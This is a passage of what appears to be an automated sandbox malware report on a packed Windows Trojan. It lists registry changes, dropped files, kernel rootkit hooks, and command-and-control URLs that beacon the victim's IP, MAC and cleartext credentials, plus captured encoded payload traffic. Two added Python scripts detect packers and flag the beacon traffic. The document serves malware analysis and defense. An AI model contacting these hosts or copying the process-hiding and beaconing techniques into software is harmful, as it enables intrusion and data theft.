"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 E3 22 63 02 25 39 AD A1 3E C2 E1 1A 86 45 50"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security-zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ndislib.exe:3296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 B7 C4 21 DA 26 5B B7 48 09 01 EF 15 6D 02 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan sets the IE security-zone flag that places all local (intranet) sites not listed in another zone in the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan sets the flag that places all network (UNC) paths in the Local Intranet zone:

"UNCAsIntranet" = "1"

The Trojan sets the flag that places all sites that bypass the proxy server in the Local Intranet zone:

"ProxyBypass" = "1"

These three values match the Windows XP defaults and are weak indicators on their own.

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\uo2zITM\Security]
[HKLM\System\CurrentControlSet\Services\uo2zITM]
[HKLM\System\CurrentControlSet\Services\uo2zITM\Enum]

A Services\<name> key complete with Security and Enum subkeys is what the Service Control Manager and PnP manager leave behind once a kernel driver service has been registered and started; deleting the key afterwards removes the registry trace of the load while the driver itself stays resident until reboot.

Dropped PE files

MD5                               File path
ac26e6f812162a024170cb017e6da5c8  c:\WINDOWS\HpE\hdptlk.exe
eba2283a18b7a9e89bf308a9e5e1608c  c:\WINDOWS\HpE\sys32\urlnav.dll
fc2c1ce99b49f7ac04ef3ff570061ae9  c:\WINDOWS\system32\LQdhJ\yYJSx.exe
d70c6fba5055c9f030553d69ca959ef1  c:\WINDOWS\system32\drivers\HideSys.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwCreateSection
ZwOpenProcess
ZwQuerySystemInformation

Hooking ZwQuerySystemInformation and ZwOpenProcess is the standard way a kernel rootkit hides processes: the first filters entries out of SystemProcessInformation enumerations, the second denies handles to the hidden processes. ZwCreateSection is commonly hooked to intercept the mapping of executable images. The report does not attribute the hooks to a module; HideSys.sys is the only kernel driver among the dropped PE files.

Propagation

VersionInfo

No information is available.

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             455174        0         0        d41d8cd98f00b204e9800998ecf8427e
.rdata  462848           2431724       0         0        d41d8cd98f00b204e9800998ecf8427e
.data   2895872          207240        0         0        d41d8cd98f00b204e9800998ecf8427e
.vmp0   3104768          966430        0         0        d41d8cd98f00b204e9800998ecf8427e
.vmp1   4071424          3871300       3874816   5.44825  0c41f9724bee2aaa564195d102c256f0
.rsrc   7946240          5744          8192      1.90322  200729e9e76fca5d3157a990fafb7b96

The first four sections have a raw size of 0: they reserve address space but contain no bytes in the file, and their section MD5 d41d8cd98f00b204e9800998ecf8427e is simply the MD5 of empty input. .vmp0 and .vmp1 are the section names VMProtect emits; nearly all of the file's 3.87 MB sits in .vmp1 and is only unpacked into .text, .rdata and .data at run time, so static signatures over those sections see nothing.
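
As an added example, not part of the Lavasoft report, the following Python decodes a PE section table and applies the heuristics just described: zero raw size with a non-zero virtual size, protector section names, writable-and-executable sections, and raw-data entropy. The section table is rebuilt from the Name/VA/VSize/RawSize values printed above; the raw pointers, characteristics and the section contents in SAMPLE_RAW are constructed stand-ins, since the report does not include them.

```python
import hashlib
import math
import struct
from collections import Counter

# IMAGE_SECTION_HEADER (40 bytes, little-endian): Name[8], VirtualSize,
# VirtualAddress, SizeOfRawData, PointerToRawData, PointerToRelocations,
# PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER_FMT = "<8sIIIIIIHHI"
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)  # 40

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Section-name prefixes written by common protectors (VMProtect, UPX, ASPack, Themida, MPRESS).
PACKER_SECTION_PREFIXES = (".vmp", "UPX", ".aspack", ".adata", ".themida", ".MPRESS")

MD5_EMPTY = hashlib.md5(b"").hexdigest()  # d41d8cd98f00b204e9800998ecf8427e


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniform bytes; packed or encrypted code sits near 7 or above."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_section_headers(table: bytes, count: int) -> list:
    """Decode `count` consecutive IMAGE_SECTION_HEADER entries from the raw section table."""
    sections = []
    for i in range(count):
        name, vsize, vaddr, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HEADER_FMT, table, i * SECTION_HEADER_SIZE)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": vaddr,
            "virtual_size": vsize,
            "raw_size": rsize,
            "raw_pointer": rptr,
            "characteristics": chars,
        })
    return sections


def packer_indicators(sections: list, raw_by_name: dict) -> dict:
    """Return {section name: [notes]} for sections that look like a runtime unpacker's work."""
    findings = {}
    for s in sections:
        notes = []
        data = raw_by_name.get(s["name"], b"")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            notes.append("no raw data but %d bytes virtual: filled at runtime, section MD5 is MD5('') = %s"
                         % (s["virtual_size"], MD5_EMPTY))
        if s["name"].startswith(PACKER_SECTION_PREFIXES):
            notes.append("protector section name")
        if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["characteristics"] & IMAGE_SCN_MEM_WRITE:
            notes.append("writable and executable")
        if data:
            ent = shannon_entropy(data)
            if ent > 7.0:
                notes.append("high entropy %.2f: compressed or encrypted" % ent)
        if notes:
            findings[s["name"]] = notes
    return findings


def build_sample_table() -> bytes:
    """Constructed section table using the Name/VA/VSize/RawSize values from the report.
    Raw pointers and characteristics are assumed; the report does not print them."""
    rows = [
        # name,    vsize,   vaddr,   rsize,   rptr,     characteristics (assumed)
        (b".text",  455174,  4096,    0,       0,        0x60000020),
        (b".rdata", 2431724, 462848,  0,       0,        0x40000040),
        (b".data",  207240,  2895872, 0,       0,        0xC0000040),
        (b".vmp0",  966430,  3104768, 0,       0,        0x60000020),
        (b".vmp1",  3871300, 4071424, 3874816, 0x400,    0xE0000060),
        (b".rsrc",  5744,    7946240, 8192,    0x3B2400, 0x40000040),
    ]
    return b"".join(
        struct.pack(SECTION_HEADER_FMT, name.ljust(8, b"\0"), vs, va, rs, rp, 0, 0, 0, 0, ch)
        for name, vs, va, rs, rp, ch in rows)


# Constructed stand-ins for section contents (the report gives entropy values, not the bytes).
SAMPLE_RAW = {
    ".vmp1": bytes(range(256)) * 16,  # uniform bytes, entropy 8.0
    ".rsrc": b"\x00" * 8192,          # constant bytes, entropy 0.0
}

if __name__ == "__main__":
    for name, notes in packer_indicators(parse_section_headers(build_sample_table(), 6), SAMPLE_RAW).items():
        print(name, "->", "; ".join(notes))
```

On a real file, read the section table at the offset given by the PE header (e_lfanew + 4 + 20 + SizeOfOptionalHeader) and slice each section's bytes with PointerToRawData/SizeOfRawData to feed shannon_entropy; the heuristics themselves are unchanged.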

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://update.down123.net/tongji.php?action=list&username=icafe8&password=icafe8123&ips=192.168.11.131&version=2.0.0.4 115.28.45.16
hxxp://update.down123.net/deploy.php?ConFig=xz9 115.28.45.16
hxxp://1st.ecoma.ourwebpic.com/plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37
hxxp://ln.p2ptool.com/txt/tray_20150624.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=B8306AB9C2162907E3E8248D11FF7A56 60.18.147.37
hxxp://ln.p2ptool.com/txt/urlnav_20150922.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=5FC91A5A977345D62B641C89CD1CE439 60.18.147.37
hxxp://ln.p2ptool.com/txt/popup_20150930.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=10A09BBF8BDB9E612ED1DF8F61B9CC3C 60.18.147.37
hxxp://ln.p2ptool.com/txt/First_20150519.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 60.18.147.37
hxxp://ln.p2ptool.com/txt/minie_20151111.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=9F815C0051C483DA569169A49B602D2A 60.18.147.37
hxxp://ln.p2ptool.com/txt/listbc_20151106222121.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=528D1A231BC2A6FDDAB37F9BE32D5F93 60.18.147.37
hxxp://ln.p2ptool.com/txt/list666_20151104221146.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=CE0BAC1422C834FD0E304C8696FEA341 60.18.147.37
hxxp://ln.p2ptool.com/txt/listtl_20151106225212.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=4B0E137FE48D0E571230DAD7F1219CBA 60.18.147.37
hxxp://ln.p2ptool.com/txt/ndis500_201511062222.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=54F3F83A085F1E98C35C0A722AB6E096 60.18.147.37
hxxp://ln.p2ptool.com/txt/qpqpqp_201511062252.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=DB76EA1050F45972FC55D29EC800228E 60.18.147.37
hxxp://ln.p2ptool.com/txt/app_20150618.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=8097F137AC26A6567AB9ADCE590E5996 60.18.147.37
hxxp://ln.p2ptool.com/txt/ndislib_201511101943.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=919B83DDDD26688CC57C40AF5624370C 60.18.147.37
hxxp://ln.p2ptool.com/txt/miniIE_150427.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 60.18.147.37
hxxp://ln.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 60.18.147.37
hxxp://plus.zzinfor.cn/plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37 203.130.58.30


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET TROJAN PWS Win32/Lmir.BMQ checkin

The POLICY alert matches the User-Agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" sent to update.down123.net, which claims Windows 2000 while the component that talks to ln.p2ptool.com reports the host's real version, NT 5.1. The TROJAN alert is a content signature; the report does not record which request triggered it. The /txt/*.txt responses in the Traffic section are served as text/plain but are not text: each body is a blob over a base64-like alphabet in which the same 32-character run repeats line after line, so the underlying bytes are periodic (typically a zero-filled region of a binary) and the encoding is a per-byte or short-period transform rather than a chained cipher.
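
As an added example, not part of the report and not the malware's own code, the following Python runs the checks an analyst would apply to the requests captured in the Traffic section: an internal IP address and a MAC address leaked in the query string, credentials sent in a cleartext query, a component hash reported to the update server, and a User-Agent whose Windows version does not match the host (the condition behind the POLICY alert). Three sample requests are copied from the capture; the www.example.com control request and HOST_NT_VERSION are assumptions.

```python
import re
from ipaddress import ip_address
from urllib.parse import parse_qsl, urlsplit

# Assumption: the analysis host is Windows XP, which reports itself as "Windows NT 5.1".
HOST_NT_VERSION = "5.1"

LOCAL_IP_KEYS = {"lip", "ips", "ip", "localip"}
MAC_KEYS = {"mac"}
CRED_KEYS = {"username", "user", "password", "pass", "passwd", "pwd"}
HASH_KEYS = {"md5"}

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{12}|(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2})$")
MD5_RE = re.compile(r"^[0-9A-Fa-f]{32}$")
NT_VERSION_RE = re.compile(r"Windows NT (\d+\.\d+)")

# Three requests copied from the Traffic section of this report plus one constructed
# benign request (www.example.com) used as a control.
SAMPLE_REQUESTS = [
    "GET /txt/ndislib_201511101943.txt?ver=3.180&uid=down123.0&lip=192.168.11.131"
    "&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=919B83DDDD26688CC57C40AF5624370C HTTP/1.1\n"
    "Accept: */*\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)\n"
    "Host: ln.p2ptool.com\n"
    "Connection: Close\n",
    "GET /tongji.php?action=list&username=icafe8&password=icafe8123&ips=192.168.11.131"
    "&version=2.0.0.4 HTTP/1.1\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n"
    "Accept: */*\n"
    "Host: update.down123.net\n",
    "GET /deploy.php?ConFig=xz9 HTTP/1.1\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n"
    "Accept: */*\n"
    "Host: update.down123.net\n",
    "GET /index.html?lang=en HTTP/1.1\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\n"
    "Host: www.example.com\n",
]


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request head into method, host, path, query parameters and User-Agent."""
    lines = [line for line in raw.splitlines() if line.strip()]
    method, target, _version = lines[0].split(maxsplit=2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {
        "method": method,
        "host": headers.get("host", ""),
        "path": url.path,
        "params": parse_qsl(url.query, keep_blank_values=True),
        "user_agent": headers.get("user-agent", ""),
    }


def is_private_ipv4(value: str) -> bool:
    """True for an IPv4 literal in a non-public range (RFC 1918, loopback, link-local), False otherwise."""
    try:
        ip = ip_address(value)
    except ValueError:
        return False
    return ip.version == 4 and ip.is_private


def inspect_request(req: dict, host_nt_version: str = HOST_NT_VERSION) -> list:
    """Return the findings for one parsed request; an empty list means nothing matched."""
    findings = []
    for key, value in req["params"]:
        k = key.lower()
        if k in LOCAL_IP_KEYS and is_private_ipv4(value):
            findings.append("internal IPv4 %s sent in query parameter %s" % (value, key))
        if k in MAC_KEYS and MAC_RE.match(value):
            findings.append("MAC address %s sent in query parameter %s" % (value, key))
        if k in CRED_KEYS:
            findings.append("credential parameter %s sent in cleartext query string" % key)
        if k in HASH_KEYS and MD5_RE.match(value):
            findings.append("component hash reported in parameter %s (update/version poll)" % key)
    m = NT_VERSION_RE.search(req["user_agent"])
    if m and m.group(1) != host_nt_version:
        findings.append("User-Agent claims Windows NT %s but host is NT %s" % (m.group(1), host_nt_version))
    return findings


def triage(raw_requests: list, host_nt_version: str = HOST_NT_VERSION) -> dict:
    """Map 'host/path' to its findings for every request in the list."""
    report = {}
    for raw in raw_requests:
        req = parse_request(raw)
        report[req["host"] + req["path"]] = inspect_request(req, host_nt_version)
    return report


if __name__ == "__main__":
    for target, findings in triage(SAMPLE_REQUESTS).items():
        print(target, "->", findings or "clean")
```

The parameter-name sets are deliberately small; in a proxy log the same checks are usually run as a value-shape match (private IPv4, 12 hex digits, 32 hex digits) regardless of the key name, since operators rename beacon fields freely.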

Traffic

GET /txt/ndislib_201511101943.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=919B83DDDD26688CC57C40AF5624370C HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:49 GMT
Content-Type: text/plain
Content-Length: 324428
Last-Modified: Tue, 10 Nov 2015 11:43:50 GMT
Connection: close
ETag: "5641d876-4f34c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnKaEKbhAp/JvZsvB8Nn4Io6syqgQ9/SDaBLyvdjTh
fOrxE3XJ re1nM L5TwwJP6H0pEUYmcRBmOceMRuqxVNkb7JwfEVu4XsUhcvwly vksMTa
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB0xVG2WOXvXn3YNPrA6SxfVvh3CJHt4
bIKI0mNWJEoCFRjYnLeAoMjy5ye8miatn/lycn0DaQTrWJvgEYtUqAbYm ARi1SoBtPvK
pACZjJd7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrbN9ymUhbHB
OK3fYskZxLv8TazQ2ZSPlrxNrNDZlI WuRDnkI6xLTnMTazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrF1t0sbdoWZzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrTPMmJn/9ziGb5WV0mXW AYsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMax
jFZ7qzIWGvSJ2G7O6XC5Y8YEKsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWN0D6Bmr0kKeRS
I7 4oAkizE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oW3yI nE 5Ft5gY56mj9A0om63bSlJ/0Oy6tRS5Dm3SiqSQMs7a n1G2cKNuElZSmmL5
PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E
7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz

<<< skipped >>>

GET /txt/qpqpqp_201511062252.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=DB76EA1050F45972FC55D29EC800228E HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:46 GMT
Content-Type: text/plain
Content-Length: 141392
Last-Modified: Fri, 06 Nov 2015 14:52:41 GMT
Connection: close
ETag: "563cbeb9-22850"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnKaEKbhAp/JvZsvB8Nn4Io6syqgQ9/SDaBLyvdjTh
fOrxE3XJ re1nM L5TwwJP6H0pEUYmcRBmOceMRuqxVNkb7JwfEVu4XsUhcvwly vksMTa
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB0xVG2WOXvXn3YNPrA6SxfVvh3CJHt4
bIKI0mNWJEoCFRjYnLeAoMjy5ye8miatn/lycn0DaQTrWJvgEYtUqAbYm ARi1SoBtPvK
pACZjJd7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrbN9ymUhbHB
OK3fYskZxLv8TazQ2ZSPlrxNrNDZlI WuRDnkI6xLTnMTazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrF1t0sbdoWZzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrTPMmJn/9ziGb5WV0mXW AYsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMax
jFZ7qzIWGvSJ2G7O6XC5Y8YEKsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWN0D6Bmr0kKeRS
I7 4oAkizE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oW3yI nE 5Ft5gY56mj9A0om63bSlJ/0Oy6tRS5Dm3SiqSQMs7a n1G2cKNuElZSmmL5
PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E
7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz

<<< skipped >>>

GET /txt/listtl_20151106225212.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=4B0E137FE48D0E571230DAD7F1219CBA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:39 GMT
Content-Type: text/plain
Content-Length: 17808
